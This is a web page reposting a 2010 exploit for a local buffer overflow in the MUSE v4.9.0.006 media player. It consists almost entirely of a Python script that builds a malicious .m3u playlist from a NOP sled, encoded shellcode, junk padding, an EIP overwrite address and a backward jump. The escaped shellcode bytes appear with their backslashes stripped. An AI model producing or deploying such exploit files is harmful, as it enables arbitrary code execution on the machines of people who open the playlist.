Home / os / win7

MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit

Posted on 16 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit ==================================================== # Exploit Title: MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit # Date: August 17, 2010 # Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) # Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html # Version: 4.9.0.006 # Tested on: Windows XP SP3 En buffersize = 205 nopsled = &quot;x90&quot; * 4 # Custom MessageBox # x86/shikata_ga_nai succeeded with size 104 (iteration=1) shellcode = (&quot;xd9xe5x29xc9xbexe0xc8xa6x9fxb1x14xd9x74x24xf4&quot; &quot;x5fx83xc7x04x31x77x14x03x77xf4x2ax53xf7x8cx8a&quot; &quot;xbcx08x04xacxd9x4axbbx5ax47x38x30xfaxefxd1xdb&quot; &quot;xdcxa2x45x60x68x4exe2xefx71xd8x6fx8bx54x19x18&quot; &quot;x36xf4x6cxacxd0x9fxaex09x58x08xc3xf2xf7xacx73&quot; &quot;xa6x6fx48xe8xc1x8exa3x30x81x03x95xe0x98x49x12&quot; &quot;x44xa3x72xcfx77x9bxdcx48x65xd0x5dxd4x75x36&quot;) junk = &quot;x90&quot; * (buffersize-(len(nopsled)+len(shellcode))) njump = &quot;xe9x29xffxffxff&quot; eip = &quot;x53x93x42x7e&quot; payload = nopsled+shellcode+junk+eip+nopsled+njump try: print &quot;[+] Creating exploit file..&quot; exploit = open('muse.m3u','w'); exploit.write(payload); exploit.close(); print &quot;[+] Writing&quot;, len(payload), &quot;bytes to muse.m3u&quot; print &quot;[+] Exploit file created!&quot; except: print &quot;[-] Error: You do not have correct permissions..&quot; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-16]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP